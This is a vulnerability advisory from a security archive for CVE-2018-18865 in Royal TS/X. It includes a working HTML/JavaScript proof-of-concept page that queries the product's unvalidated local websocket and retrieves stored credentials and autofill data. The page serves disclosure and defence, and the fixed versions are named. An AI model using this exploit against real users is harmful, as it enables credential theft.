exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Royal TS/X Information Disclosure

Royal TS/X Information Disclosure
Posted Nov 2, 2018
Authored by Jakub Palaczynski

Royal TS/X suffer from an information disclosure vulnerability. Versions that addressed this issue are Royal TSX (for macOS) 3.3.1 released on 2018-09-13 and Royal TS (for Windows) 4.3.60728 released on 2018-07-28.

tags | exploit, info disclosure
advisories | CVE-2018-18865
SHA-256 | 30a8f68202f76aee408d4e0297fef81078061740a46cf53f71a7a86a80ac013a

Royal TS/X Information Disclosure

Change Mirror Download
Title: Royal TS/X - Information Disclosure
Author: Jakub Palaczynski
Date: 10. July 2018
CVE: CVE-2018-18865

Affected product:
=============

Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta


Vulnerability - Information Disclosure:
=============================

Any third party web application can steal credentials created in Royal TS/X
when browser extension is enabled.
Browser extension communicates using websockets (default TCP port 54890)
and websockets do not use any validation to verify origin of the request.


PoC website:
==========

<!DOCTYPE html>
<meta charset="utf-8" />
<title>RoyalTS/X Exploit</title>
<script language="javascript" type="text/javascript">

var wsUri = "ws://127.0.0.1:54890/";
var output;

function init()
{
output = document.getElementById("output");
testWebSocket();
}

function testWebSocket()
{
writeToScreen("Let's retrieve some data...");
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}

function onOpen(evt,message)
{
doSend(message);
}

function onClose(evt)
{
}

function onMessage(evt)
{
var obj = JSON.parse(evt.data);
if (obj['Command'] == "GetDocuments") {
for (var x in obj['ResponseData']){
writeToScreen("Name: " + obj['ResponseData'][x]['Name']);
writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);
for (var y in obj['ResponseData'][x]['Credentials']){
writeToScreen("Username: " +
obj['ResponseData'][x]['Credentials'][y]['UserName']);
writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);
if (obj['ResponseData'][x]['Unlocked'] == true){
websocket.close();
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""
+ obj['ResponseData'][x]['Credentials'][y]['ID'] +
"\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
}
}
}
else {
if (obj['Command'] == "GetLoginInformation") {
var obj = JSON.parse(evt.data);
writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));
}
}
}

function onError(evt)
{
writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
}

function doSend(message)
{
websocket.send(message);
}

function writeToScreen(message)
{
var pre = document.createElement("p");
pre.style.wordWrap = "break-word";
pre.innerHTML = message;
output.appendChild(pre);
}

window.addEventListener("load", init, false);

</script>

<h2>RoyalTS/X Exploit</h2>

<div id="output"></div>


Contact:
=======

Jakub[dot]Palaczynski[at]gmail[dot]com


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close